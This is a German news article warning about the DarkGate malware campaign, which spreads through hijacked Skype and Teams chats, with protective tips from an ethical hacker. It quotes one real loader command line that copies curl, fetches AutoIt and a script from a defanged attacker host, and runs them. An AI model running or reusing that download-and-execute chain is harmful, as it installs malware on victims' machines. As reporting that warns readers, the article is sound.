Eine besonders tückische Malware mit dem Namen „DarkGate“ wird derzeit über Skype- und Teams-Konten übertragen. Hacker verteilen Malware über Microsoft Teams und Skype.
Zur Zeit läuft aktuell eine Hacker-Kampagne, bei der Cyberkriminelle Microsofts Kommunikationsplattformen Skype und Teams missbrauchen, um die Malware
zu verteilen, so der Ethical- Hacker Ralf Schmitz.
Wie die Angriffe ablaufen und wie Sie sich schützen können erklärt Ralf Schmitz.
Die Hacker nutzen kompromittierte Skype-Konten, um Nachrichten mit VBA-Loader-Skript-Anhängen zu verschicken, die sich als PDF-Dokument ausgeben.
Der Zugriff auf das Skype-Konto ermöglicht den Hackern, einen bestehenden Nachrichten-Thread zu kapern und die Dateien so zu benennen, dass sie zum Kontext des Chat-Verlaufs passen. Das ist sehr gefährlich.
Was sich die Betroffenen auf ihren PC herunterladen, ist auf den ersten Blick somit nicht unbedingt zu erkennen.
Nicht alle Virenschutzprogramme erkennen diesen Angriff und so kann in kurzer Zeit eine Vielzahl von Rechnern / Handys infiziert werden, so Hacker Ralf Schmitz.
So verbreitet sich diese Malware
Diesmal heißt die Malware „DarkGate“ und verbreitet sich derzeit über Skype- und Teams-Konten.
Hacker verteilen Malware über Microsoft Teams und Skype
Die Masche dieser Malware ist diesmal besonders tückisch. Die Hacker versenden Nachrichten mit VBA-Loader-Skript-Anhängen, so z. B.
C:\Windows\System32\cmd.exe“ /c mkdir c:\zohn & cd /dc:\zohn & copy C:\windows\system32\curl.exe zohn.exe & zohn -o Autoit3.exe hxxp:/ /reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz & Autoit3.exe BzpXNT.au3
um die PCs ihrer Opfer mit der Schadsoftware zu infizieren.
Bestehende Nachrichtenverläufe werden nachgestellt und die Namen der Dateien so gestaltet, dass sie dem Kontext des Chatverlaufs entsprechen, schreibt dazu TrendMicro eine Sicherheitsfirma.
Die Vorsichtsmaßnahme, nur Dateien von bekannten Kontakten anzunehmen, hilft also bei „DarkGate“ wenig.
Ein großes Datenleck könnte dahinterstecken!
Es ist zur Zeit noch unklar, wie die Konten der Anwendungen kompromittiert wurden.
Es wird jedoch vermutet, dass dies entweder durch durchgesickerte Zugangsdaten in Untergrundforen oder durch die vorherige Kompromittierung der Mutterorganisation geschah.
Sicherheitstipp von Ethical-Hacker Ralf Schmitz!
Skype- und Teams-Nutzer*innen rät Ralf Schmitz ihre Sicherheitssoftware und Antivirenprogramme immer zu aktualisieren und auch wöchentliche Prüfungen auf Handy, PC, Tablet durchzuführen, um Schadsoftware auf den eigenen Geräten frühzeitig zu erkennen.
Auch Sicherheitsvorträge die solche Angriffe live einmal zeigen und die Ralf Schmitz regelmäßig in Deutschland anbietet, können die Sicherheit erhöhen.
Auch Virenschutzsoftware von verschiedenen Herstellern, können helfen. Diese darf aber nicht zeitgleich auf allen Geräten ausgeführt werden.
Wenn Opfer die präparierte Datei angeklickt haben, löst dies den Download und die Ausführung eines AutoIT-Skripts zum Starten der DarkGate-Malware aus. Der Hacker hat nach der erfolgreichen Installation der Malware dann mehrere Optionen.
So ließen sich Informationen stehlen und die Systeme mit verschiedenen Arten von Schadsoftware infizieren, darunter Ransomware, bösartige Fernsteuerungs-Tools und Crypto-Miner.
Außerdem wird gerade beobachtet, dass die Angreifer versuchten, die DarkGate-Malware via Microsoft Teams in Unternehmen und Finanzinstitute einzuschleusen, die den Dienst so konfiguriert haben, dass er Nachrichten von externen Usern akzeptiert. Dabei sendeten die Kriminellen ZIP-Archive mit einer LNK-Datei, die dazu dient, ein VBA-Skript auszuführen.
Das wichtigste Mittel, um Hackerangriffe zu verhindern, ist eine Menge Erfahrung im Netz und Sicherheitssoftware, um solche perfiden Angriffe zu verhindern.